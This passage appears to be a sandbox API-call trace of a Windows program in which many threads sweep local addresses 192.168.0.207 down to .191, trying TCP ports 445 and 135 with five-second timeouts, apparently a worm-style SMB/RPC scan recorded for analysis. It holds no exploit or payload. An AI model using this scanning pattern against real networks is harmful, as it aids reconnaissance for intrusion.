0 [0101.115] RtlExitUserThread (Status=0x0) Thread: id = 106 os_tid = 0x894 [0090.876] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073d70 [0090.876] free (_Block=0x2073d70) [0090.876] inet_addr (cp="192.168.0.207") returned 0xcf00a8c0 [0090.876] htons (hostshort=0x1bd) returned 0xbd01 [0090.876] socket (af=2, type=1, protocol=6) returned 0x978 [0091.023] ioctlsocket (in: s=0x978, cmd=-2147195266, argp=0x7a2ff34 | out: argp=0x7a2ff34) returned 0 [0091.023] connect (s=0x978, name=0x7a2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.207"), namelen=16) returned -1 [0091.023] WSAGetLastError () returned 10035 [0091.023] select (in: nfds=0, readfds=0x0, writefds=0x7a2fd08, exceptfds=0x7a2fe10, timeout=0x7a2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7a2fd08, exceptfds=0x7a2fe10) returned 0 [0096.057] closesocket (s=0x978) returned 0 [0096.057] inet_addr (cp="192.168.0.207") returned 0xcf00a8c0 [0096.057] htons (hostshort=0x87) returned 0x8700 [0096.057] socket (af=2, type=1, protocol=6) returned 0x978 [0096.058] ioctlsocket (in: s=0x978, cmd=-2147195266, argp=0x7a2ff34 | out: argp=0x7a2ff34) returned 0 [0096.058] connect (s=0x978, name=0x7a2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.207"), namelen=16) returned -1 [0096.058] WSAGetLastError () returned 10035 [0096.058] select (in: nfds=0, readfds=0x0, writefds=0x7a2fd08, exceptfds=0x7a2fe10, timeout=0x7a2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7a2fd08, exceptfds=0x7a2fe10) returned 0 [0101.116] closesocket (s=0x978) returned 0 [0101.116] RtlExitUserThread (Status=0x0) Thread: id = 107 os_tid = 0x564 [0090.876] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073d48 [0090.876] free (_Block=0x2073d48) [0090.876] inet_addr (cp="192.168.0.206") returned 0xce00a8c0 [0090.876] htons (hostshort=0x1bd) returned 0xbd01 [0090.876] socket (af=2, type=1, protocol=6) returned 0x980 [0091.024] ioctlsocket (in: s=0x980, cmd=-2147195266, argp=0x7b6ff34 | out: argp=0x7b6ff34) returned 0 [0091.024] connect (s=0x980, name=0x7b6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.206"), namelen=16) returned -1 [0091.024] WSAGetLastError () returned 10035 [0091.024] select (in: nfds=0, readfds=0x0, writefds=0x7b6fd08, exceptfds=0x7b6fe10, timeout=0x7b6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7b6fd08, exceptfds=0x7b6fe10) returned 0 [0096.056] closesocket (s=0x980) returned 0 [0096.056] inet_addr (cp="192.168.0.206") returned 0xce00a8c0 [0096.056] htons (hostshort=0x87) returned 0x8700 [0096.056] socket (af=2, type=1, protocol=6) returned 0x980 [0096.056] ioctlsocket (in: s=0x980, cmd=-2147195266, argp=0x7b6ff34 | out: argp=0x7b6ff34) returned 0 [0096.056] connect (s=0x980, name=0x7b6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.206"), namelen=16) returned -1 [0096.057] WSAGetLastError () returned 10035 [0096.057] select (in: nfds=0, readfds=0x0, writefds=0x7b6fd08, exceptfds=0x7b6fe10, timeout=0x7b6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7b6fd08, exceptfds=0x7b6fe10) returned 0 [0101.117] closesocket (s=0x980) returned 0 [0101.118] RtlExitUserThread (Status=0x0) Thread: id = 108 os_tid = 0x70c [0090.877] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073d20 [0090.877] free (_Block=0x2073d20) [0090.877] inet_addr (cp="192.168.0.205") returned 0xcd00a8c0 [0090.877] htons (hostshort=0x1bd) returned 0xbd01 [0090.877] socket (af=2, type=1, protocol=6) returned 0x988 [0091.024] ioctlsocket (in: s=0x988, cmd=-2147195266, argp=0x7caff34 | out: argp=0x7caff34) returned 0 [0091.025] connect (s=0x988, name=0x7caff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.205"), namelen=16) returned -1 [0091.025] WSAGetLastError () returned 10035 [0091.025] select (in: nfds=0, readfds=0x0, writefds=0x7cafd08, exceptfds=0x7cafe10, timeout=0x7caff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7cafd08, exceptfds=0x7cafe10) returned 0 [0096.054] closesocket (s=0x988) returned 0 [0096.055] inet_addr (cp="192.168.0.205") returned 0xcd00a8c0 [0096.055] htons (hostshort=0x87) returned 0x8700 [0096.055] socket (af=2, type=1, protocol=6) returned 0x988 [0096.055] ioctlsocket (in: s=0x988, cmd=-2147195266, argp=0x7caff34 | out: argp=0x7caff34) returned 0 [0096.055] connect (s=0x988, name=0x7caff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.205"), namelen=16) returned -1 [0096.055] WSAGetLastError () returned 10035 [0096.056] select (in: nfds=0, readfds=0x0, writefds=0x7cafd08, exceptfds=0x7cafe10, timeout=0x7caff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7cafd08, exceptfds=0x7cafe10) returned 0 [0101.119] closesocket (s=0x988) returned 0 [0101.120] RtlExitUserThread (Status=0x0) Thread: id = 109 os_tid = 0x434 [0090.877] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073cf8 [0090.877] free (_Block=0x2073cf8) [0090.877] inet_addr (cp="192.168.0.204") returned 0xcc00a8c0 [0090.877] htons (hostshort=0x1bd) returned 0xbd01 [0090.877] socket (af=2, type=1, protocol=6) returned 0x990 [0091.025] ioctlsocket (in: s=0x990, cmd=-2147195266, argp=0x7deff34 | out: argp=0x7deff34) returned 0 [0091.025] connect (s=0x990, name=0x7deff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.204"), namelen=16) returned -1 [0091.026] WSAGetLastError () returned 10035 [0091.026] select (in: nfds=0, readfds=0x0, writefds=0x7defd08, exceptfds=0x7defe10, timeout=0x7deff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7defd08, exceptfds=0x7defe10) returned 0 [0096.053] closesocket (s=0x990) returned 0 [0096.054] inet_addr (cp="192.168.0.204") returned 0xcc00a8c0 [0096.054] htons (hostshort=0x87) returned 0x8700 [0096.054] socket (af=2, type=1, protocol=6) returned 0x990 [0096.054] ioctlsocket (in: s=0x990, cmd=-2147195266, argp=0x7deff34 | out: argp=0x7deff34) returned 0 [0096.054] connect (s=0x990, name=0x7deff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.204"), namelen=16) returned -1 [0096.054] WSAGetLastError () returned 10035 [0096.054] select (in: nfds=0, readfds=0x0, writefds=0x7defd08, exceptfds=0x7defe10, timeout=0x7deff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7defd08, exceptfds=0x7defe10) returned 0 [0101.089] closesocket (s=0x990) returned 0 [0101.090] RtlExitUserThread (Status=0x0) Thread: id = 110 os_tid = 0x7a8 [0090.878] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073cd0 [0090.878] free (_Block=0x2073cd0) [0090.878] inet_addr (cp="192.168.0.203") returned 0xcb00a8c0 [0090.878] htons (hostshort=0x1bd) returned 0xbd01 [0090.878] socket (af=2, type=1, protocol=6) returned 0x998 [0091.026] ioctlsocket (in: s=0x998, cmd=-2147195266, argp=0x7f2ff34 | out: argp=0x7f2ff34) returned 0 [0091.026] connect (s=0x998, name=0x7f2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.203"), namelen=16) returned -1 [0091.027] WSAGetLastError () returned 10035 [0091.027] select (in: nfds=0, readfds=0x0, writefds=0x7f2fd08, exceptfds=0x7f2fe10, timeout=0x7f2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7f2fd08, exceptfds=0x7f2fe10) returned 0 [0096.052] closesocket (s=0x998) returned 0 [0096.052] inet_addr (cp="192.168.0.203") returned 0xcb00a8c0 [0096.052] htons (hostshort=0x87) returned 0x8700 [0096.052] socket (af=2, type=1, protocol=6) returned 0x998 [0096.053] ioctlsocket (in: s=0x998, cmd=-2147195266, argp=0x7f2ff34 | out: argp=0x7f2ff34) returned 0 [0096.053] connect (s=0x998, name=0x7f2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.203"), namelen=16) returned -1 [0096.053] WSAGetLastError () returned 10035 [0096.053] select (in: nfds=0, readfds=0x0, writefds=0x7f2fd08, exceptfds=0x7f2fe10, timeout=0x7f2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x7f2fd08, exceptfds=0x7f2fe10) returned 0 [0101.091] closesocket (s=0x998) returned 0 [0101.092] RtlExitUserThread (Status=0x0) Thread: id = 111 os_tid = 0x670 [0090.878] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073ca8 [0090.878] free (_Block=0x2073ca8) [0090.878] inet_addr (cp="192.168.0.202") returned 0xca00a8c0 [0090.878] htons (hostshort=0x1bd) returned 0xbd01 [0090.878] socket (af=2, type=1, protocol=6) returned 0x9a0 [0091.027] ioctlsocket (in: s=0x9a0, cmd=-2147195266, argp=0x806ff34 | out: argp=0x806ff34) returned 0 [0091.027] connect (s=0x9a0, name=0x806ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.202"), namelen=16) returned -1 [0091.028] WSAGetLastError () returned 10035 [0091.028] select (in: nfds=0, readfds=0x0, writefds=0x806fd08, exceptfds=0x806fe10, timeout=0x806ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x806fd08, exceptfds=0x806fe10) returned 0 [0096.051] closesocket (s=0x9a0) returned 0 [0096.051] inet_addr (cp="192.168.0.202") returned 0xca00a8c0 [0096.051] htons (hostshort=0x87) returned 0x8700 [0096.051] socket (af=2, type=1, protocol=6) returned 0x9a0 [0096.051] ioctlsocket (in: s=0x9a0, cmd=-2147195266, argp=0x806ff34 | out: argp=0x806ff34) returned 0 [0096.051] connect (s=0x9a0, name=0x806ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.202"), namelen=16) returned -1 [0096.052] WSAGetLastError () returned 10035 [0096.052] select (in: nfds=0, readfds=0x0, writefds=0x806fd08, exceptfds=0x806fe10, timeout=0x806ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x806fd08, exceptfds=0x806fe10) returned 0 [0101.093] closesocket (s=0x9a0) returned 0 [0101.094] RtlExitUserThread (Status=0x0) Thread: id = 112 os_tid = 0x6f4 [0090.878] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073c80 [0090.879] free (_Block=0x2073c80) [0090.879] inet_addr (cp="192.168.0.201") returned 0xc900a8c0 [0090.879] htons (hostshort=0x1bd) returned 0xbd01 [0090.879] socket (af=2, type=1, protocol=6) returned 0x9a8 [0091.029] ioctlsocket (in: s=0x9a8, cmd=-2147195266, argp=0x81aff34 | out: argp=0x81aff34) returned 0 [0091.029] connect (s=0x9a8, name=0x81aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.201"), namelen=16) returned -1 [0091.030] WSAGetLastError () returned 10035 [0091.030] select (in: nfds=0, readfds=0x0, writefds=0x81afd08, exceptfds=0x81afe10, timeout=0x81aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x81afd08, exceptfds=0x81afe10) returned 0 [0096.049] closesocket (s=0x9a8) returned 0 [0096.050] inet_addr (cp="192.168.0.201") returned 0xc900a8c0 [0096.050] htons (hostshort=0x87) returned 0x8700 [0096.050] socket (af=2, type=1, protocol=6) returned 0x9a8 [0096.050] ioctlsocket (in: s=0x9a8, cmd=-2147195266, argp=0x81aff34 | out: argp=0x81aff34) returned 0 [0096.050] connect (s=0x9a8, name=0x81aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.201"), namelen=16) returned -1 [0096.050] WSAGetLastError () returned 10035 [0096.050] select (in: nfds=0, readfds=0x0, writefds=0x81afd08, exceptfds=0x81afe10, timeout=0x81aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x81afd08, exceptfds=0x81afe10) returned 0 [0101.094] closesocket (s=0x9a8) returned 0 [0101.095] RtlExitUserThread (Status=0x0) Thread: id = 113 os_tid = 0x72c [0090.879] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073c58 [0090.879] free (_Block=0x2073c58) [0090.879] inet_addr (cp="192.168.0.200") returned 0xc800a8c0 [0090.879] htons (hostshort=0x1bd) returned 0xbd01 [0090.879] socket (af=2, type=1, protocol=6) returned 0x9b0 [0091.030] ioctlsocket (in: s=0x9b0, cmd=-2147195266, argp=0x82eff34 | out: argp=0x82eff34) returned 0 [0091.030] connect (s=0x9b0, name=0x82eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.200"), namelen=16) returned -1 [0091.031] WSAGetLastError () returned 10035 [0091.031] select (in: nfds=0, readfds=0x0, writefds=0x82efd08, exceptfds=0x82efe10, timeout=0x82eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x82efd08, exceptfds=0x82efe10) returned 0 [0096.048] closesocket (s=0x9b0) returned 0 [0096.049] inet_addr (cp="192.168.0.200") returned 0xc800a8c0 [0096.049] htons (hostshort=0x87) returned 0x8700 [0096.049] socket (af=2, type=1, protocol=6) returned 0x9b0 [0096.049] ioctlsocket (in: s=0x9b0, cmd=-2147195266, argp=0x82eff34 | out: argp=0x82eff34) returned 0 [0096.049] connect (s=0x9b0, name=0x82eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.200"), namelen=16) returned -1 [0096.049] WSAGetLastError () returned 10035 [0096.049] select (in: nfds=0, readfds=0x0, writefds=0x82efd08, exceptfds=0x82efe10, timeout=0x82eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x82efd08, exceptfds=0x82efe10) returned 0 [0101.096] closesocket (s=0x9b0) returned 0 [0101.097] RtlExitUserThread (Status=0x0) Thread: id = 114 os_tid = 0x748 [0090.879] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073c30 [0090.879] free (_Block=0x2073c30) [0090.879] inet_addr (cp="192.168.0.199") returned 0xc700a8c0 [0090.880] htons (hostshort=0x1bd) returned 0xbd01 [0090.880] socket (af=2, type=1, protocol=6) returned 0x9b8 [0091.031] ioctlsocket (in: s=0x9b8, cmd=-2147195266, argp=0x842ff34 | out: argp=0x842ff34) returned 0 [0091.031] connect (s=0x9b8, name=0x842ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.199"), namelen=16) returned -1 [0091.032] WSAGetLastError () returned 10035 [0091.032] select (in: nfds=0, readfds=0x0, writefds=0x842fd08, exceptfds=0x842fe10, timeout=0x842ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x842fd08, exceptfds=0x842fe10) returned 0 [0096.047] closesocket (s=0x9b8) returned 0 [0096.048] inet_addr (cp="192.168.0.199") returned 0xc700a8c0 [0096.048] htons (hostshort=0x87) returned 0x8700 [0096.048] socket (af=2, type=1, protocol=6) returned 0x9b8 [0096.048] ioctlsocket (in: s=0x9b8, cmd=-2147195266, argp=0x842ff34 | out: argp=0x842ff34) returned 0 [0096.048] connect (s=0x9b8, name=0x842ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.199"), namelen=16) returned -1 [0096.048] WSAGetLastError () returned 10035 [0096.048] select (in: nfds=0, readfds=0x0, writefds=0x842fd08, exceptfds=0x842fe10, timeout=0x842ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x842fd08, exceptfds=0x842fe10) returned 0 [0101.098] closesocket (s=0x9b8) returned 0 [0101.098] RtlExitUserThread (Status=0x0) Thread: id = 115 os_tid = 0x984 [0091.064] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073c08 [0091.064] free (_Block=0x2073c08) [0091.071] inet_addr (cp="192.168.0.198") returned 0xc600a8c0 [0091.071] htons (hostshort=0x1bd) returned 0xbd01 [0091.071] socket (af=2, type=1, protocol=6) returned 0x9c8 [0091.072] ioctlsocket (in: s=0x9c8, cmd=-2147195266, argp=0x856ff34 | out: argp=0x856ff34) returned 0 [0091.072] connect (s=0x9c8, name=0x856ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.198"), namelen=16) returned -1 [0091.073] WSAGetLastError () returned 10035 [0091.073] select (in: nfds=0, readfds=0x0, writefds=0x856fd08, exceptfds=0x856fe10, timeout=0x856ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x856fd08, exceptfds=0x856fe10) returned 0 [0096.078] closesocket (s=0x9c8) returned 0 [0096.079] inet_addr (cp="192.168.0.198") returned 0xc600a8c0 [0096.079] htons (hostshort=0x87) returned 0x8700 [0096.079] socket (af=2, type=1, protocol=6) returned 0x9c8 [0096.079] ioctlsocket (in: s=0x9c8, cmd=-2147195266, argp=0x856ff34 | out: argp=0x856ff34) returned 0 [0096.079] connect (s=0x9c8, name=0x856ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.198"), namelen=16) returned -1 [0096.080] WSAGetLastError () returned 10035 [0096.080] select (in: nfds=0, readfds=0x0, writefds=0x856fd08, exceptfds=0x856fe10, timeout=0x856ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x856fd08, exceptfds=0x856fe10) returned 0 [0101.131] closesocket (s=0x9c8) returned 0 [0101.131] RtlExitUserThread (Status=0x0) Thread: id = 116 os_tid = 0x864 [0091.074] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073be0 [0091.075] free (_Block=0x2073be0) [0091.075] inet_addr (cp="192.168.0.197") returned 0xc500a8c0 [0091.075] htons (hostshort=0x1bd) returned 0xbd01 [0091.075] socket (af=2, type=1, protocol=6) returned 0x9d4 [0091.075] ioctlsocket (in: s=0x9d4, cmd=-2147195266, argp=0x86aff34 | out: argp=0x86aff34) returned 0 [0091.075] connect (s=0x9d4, name=0x86aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.197"), namelen=16) returned -1 [0091.103] WSAGetLastError () returned 10035 [0091.104] select (in: nfds=0, readfds=0x0, writefds=0x86afd08, exceptfds=0x86afe10, timeout=0x86aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x86afd08, exceptfds=0x86afe10) returned 0 [0096.105] closesocket (s=0x9d4) returned 0 [0096.106] inet_addr (cp="192.168.0.197") returned 0xc500a8c0 [0096.106] htons (hostshort=0x87) returned 0x8700 [0096.106] socket (af=2, type=1, protocol=6) returned 0x9d4 [0096.106] ioctlsocket (in: s=0x9d4, cmd=-2147195266, argp=0x86aff34 | out: argp=0x86aff34) returned 0 [0096.106] connect (s=0x9d4, name=0x86aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.197"), namelen=16) returned -1 [0096.106] WSAGetLastError () returned 10035 [0096.106] select (in: nfds=0, readfds=0x0, writefds=0x86afd08, exceptfds=0x86afe10, timeout=0x86aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x86afd08, exceptfds=0x86afe10) returned 0 [0101.132] closesocket (s=0x9d4) returned 0 [0101.133] RtlExitUserThread (Status=0x0) Thread: id = 117 os_tid = 0xa04 [0091.104] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073bb8 [0091.104] free (_Block=0x2073bb8) [0091.104] inet_addr (cp="192.168.0.196") returned 0xc400a8c0 [0091.104] htons (hostshort=0x1bd) returned 0xbd01 [0091.104] socket (af=2, type=1, protocol=6) returned 0x9e0 [0091.104] ioctlsocket (in: s=0x9e0, cmd=-2147195266, argp=0x87eff34 | out: argp=0x87eff34) returned 0 [0091.104] connect (s=0x9e0, name=0x87eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.196"), namelen=16) returned -1 [0091.105] WSAGetLastError () returned 10035 [0091.105] select (in: nfds=0, readfds=0x0, writefds=0x87efd08, exceptfds=0x87efe10, timeout=0x87eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x87efd08, exceptfds=0x87efe10) returned 0 [0096.104] closesocket (s=0x9e0) returned 0 [0096.105] inet_addr (cp="192.168.0.196") returned 0xc400a8c0 [0096.105] htons (hostshort=0x87) returned 0x8700 [0096.105] socket (af=2, type=1, protocol=6) returned 0x9e0 [0096.105] ioctlsocket (in: s=0x9e0, cmd=-2147195266, argp=0x87eff34 | out: argp=0x87eff34) returned 0 [0096.105] connect (s=0x9e0, name=0x87eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.196"), namelen=16) returned -1 [0096.105] WSAGetLastError () returned 10035 [0096.105] select (in: nfds=0, readfds=0x0, writefds=0x87efd08, exceptfds=0x87efe10, timeout=0x87eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x87efd08, exceptfds=0x87efe10) returned 0 [0101.134] closesocket (s=0x9e0) returned 0 [0101.134] RtlExitUserThread (Status=0x0) Thread: id = 118 os_tid = 0x6d8 [0091.105] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073b90 [0091.105] free (_Block=0x2073b90) [0091.105] inet_addr (cp="192.168.0.195") returned 0xc300a8c0 [0091.106] htons (hostshort=0x1bd) returned 0xbd01 [0091.106] socket (af=2, type=1, protocol=6) returned 0x9ec [0091.106] ioctlsocket (in: s=0x9ec, cmd=-2147195266, argp=0x892ff34 | out: argp=0x892ff34) returned 0 [0091.106] connect (s=0x9ec, name=0x892ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.195"), namelen=16) returned -1 [0091.106] WSAGetLastError () returned 10035 [0091.106] select (in: nfds=0, readfds=0x0, writefds=0x892fd08, exceptfds=0x892fe10, timeout=0x892ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x892fd08, exceptfds=0x892fe10) returned 0 [0096.103] closesocket (s=0x9ec) returned 0 [0096.104] inet_addr (cp="192.168.0.195") returned 0xc300a8c0 [0096.104] htons (hostshort=0x87) returned 0x8700 [0096.104] socket (af=2, type=1, protocol=6) returned 0x9ec [0096.104] ioctlsocket (in: s=0x9ec, cmd=-2147195266, argp=0x892ff34 | out: argp=0x892ff34) returned 0 [0096.104] connect (s=0x9ec, name=0x892ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.195"), namelen=16) returned -1 [0096.104] WSAGetLastError () returned 10035 [0096.104] select (in: nfds=0, readfds=0x0, writefds=0x892fd08, exceptfds=0x892fe10, timeout=0x892ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x892fd08, exceptfds=0x892fe10) returned 0 [0101.135] closesocket (s=0x9ec) returned 0 [0101.136] RtlExitUserThread (Status=0x0) Thread: id = 119 os_tid = 0x630 [0091.109] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073b68 [0091.109] free (_Block=0x2073b68) [0091.109] inet_addr (cp="192.168.0.194") returned 0xc200a8c0 [0091.109] htons (hostshort=0x1bd) returned 0xbd01 [0091.109] socket (af=2, type=1, protocol=6) returned 0x9f8 [0091.109] ioctlsocket (in: s=0x9f8, cmd=-2147195266, argp=0x8a6ff34 | out: argp=0x8a6ff34) returned 0 [0091.110] connect (s=0x9f8, name=0x8a6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.194"), namelen=16) returned -1 [0091.110] WSAGetLastError () returned 10035 [0091.110] select (in: nfds=0, readfds=0x0, writefds=0x8a6fd08, exceptfds=0x8a6fe10, timeout=0x8a6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8a6fd08, exceptfds=0x8a6fe10) returned 0 [0096.118] closesocket (s=0x9f8) returned 0 [0096.119] inet_addr (cp="192.168.0.194") returned 0xc200a8c0 [0096.119] htons (hostshort=0x87) returned 0x8700 [0096.119] socket (af=2, type=1, protocol=6) returned 0x9f8 [0096.119] ioctlsocket (in: s=0x9f8, cmd=-2147195266, argp=0x8a6ff34 | out: argp=0x8a6ff34) returned 0 [0096.119] connect (s=0x9f8, name=0x8a6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.194"), namelen=16) returned -1 [0096.119] WSAGetLastError () returned 10035 [0096.119] select (in: nfds=0, readfds=0x0, writefds=0x8a6fd08, exceptfds=0x8a6fe10, timeout=0x8a6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8a6fd08, exceptfds=0x8a6fe10) returned 0 [0101.148] closesocket (s=0x9f8) returned 0 [0101.148] RtlExitUserThread (Status=0x0) Thread: id = 120 os_tid = 0xb30 [0091.113] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073b40 [0091.113] free (_Block=0x2073b40) [0091.113] inet_addr (cp="192.168.0.193") returned 0xc100a8c0 [0091.113] htons (hostshort=0x1bd) returned 0xbd01 [0091.113] socket (af=2, type=1, protocol=6) returned 0xa04 [0091.113] ioctlsocket (in: s=0xa04, cmd=-2147195266, argp=0x8baff34 | out: argp=0x8baff34) returned 0 [0091.113] connect (s=0xa04, name=0x8baff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.193"), namelen=16) returned -1 [0091.114] WSAGetLastError () returned 10035 [0091.114] select (in: nfds=0, readfds=0x0, writefds=0x8bafd08, exceptfds=0x8bafe10, timeout=0x8baff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8bafd08, exceptfds=0x8bafe10) returned 0 [0096.119] closesocket (s=0xa04) returned 0 [0096.120] inet_addr (cp="192.168.0.193") returned 0xc100a8c0 [0096.120] htons (hostshort=0x87) returned 0x8700 [0096.120] socket (af=2, type=1, protocol=6) returned 0xa04 [0096.120] ioctlsocket (in: s=0xa04, cmd=-2147195266, argp=0x8baff34 | out: argp=0x8baff34) returned 0 [0096.120] connect (s=0xa04, name=0x8baff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.193"), namelen=16) returned -1 [0096.120] WSAGetLastError () returned 10035 [0096.120] select (in: nfds=0, readfds=0x0, writefds=0x8bafd08, exceptfds=0x8bafe10, timeout=0x8baff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8bafd08, exceptfds=0x8bafe10) returned 0 [0101.146] closesocket (s=0xa04) returned 0 [0101.147] RtlExitUserThread (Status=0x0) Thread: id = 121 os_tid = 0x34c [0091.115] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073b18 [0091.115] free (_Block=0x2073b18) [0091.115] inet_addr (cp="192.168.0.192") returned 0xc000a8c0 [0091.115] htons (hostshort=0x1bd) returned 0xbd01 [0091.115] socket (af=2, type=1, protocol=6) returned 0xa10 [0091.115] ioctlsocket (in: s=0xa10, cmd=-2147195266, argp=0x8ceff34 | out: argp=0x8ceff34) returned 0 [0091.115] connect (s=0xa10, name=0x8ceff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.192"), namelen=16) returned -1 [0091.116] WSAGetLastError () returned 10035 [0091.116] select (in: nfds=0, readfds=0x0, writefds=0x8cefd08, exceptfds=0x8cefe10, timeout=0x8ceff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8cefd08, exceptfds=0x8cefe10) returned 0 [0096.120] closesocket (s=0xa10) returned 0 [0096.121] inet_addr (cp="192.168.0.192") returned 0xc000a8c0 [0096.121] htons (hostshort=0x87) returned 0x8700 [0096.121] socket (af=2, type=1, protocol=6) returned 0xa10 [0096.121] ioctlsocket (in: s=0xa10, cmd=-2147195266, argp=0x8ceff34 | out: argp=0x8ceff34) returned 0 [0096.121] connect (s=0xa10, name=0x8ceff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.192"), namelen=16) returned -1 [0096.121] WSAGetLastError () returned 10035 [0096.121] select (in: nfds=0, readfds=0x0, writefds=0x8cefd08, exceptfds=0x8cefe10, timeout=0x8ceff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x8cefd08, exceptfds=0x8cefe10) returned 0 [0101.145] closesocket (s=0xa10) returned 0 [0101.145] RtlExitUserThread (Status=0x0) Thread: id = 122 os_tid = 0x220 [0091.117] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2073af0 [0091.117] free (_Block=0x2073af0) [0091.117] inet_addr (cp="192.168.0.191") returned 0xbf00a8c0 [0091.117] htons (hostshort=0x1bd) returned 0xbd01 [0091.117] socket (af=2, type=1, protocol=6) returned 0xa1c [0091.117] ioctlsocket (in: s=0xa1c, cmd=-2147195266, argp=0x8e2ff34 | out: argp=0x8e2ff34) returned 0 [0091.117] connect (s=0xa1c, name=0x8e2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.191"), namelen=16) returned -1 [0091.117] WSAGetLastError () returned 10035 [0091.117] select (in: nfds=0, readfds=0x0, writefds=0x8e2fd08, 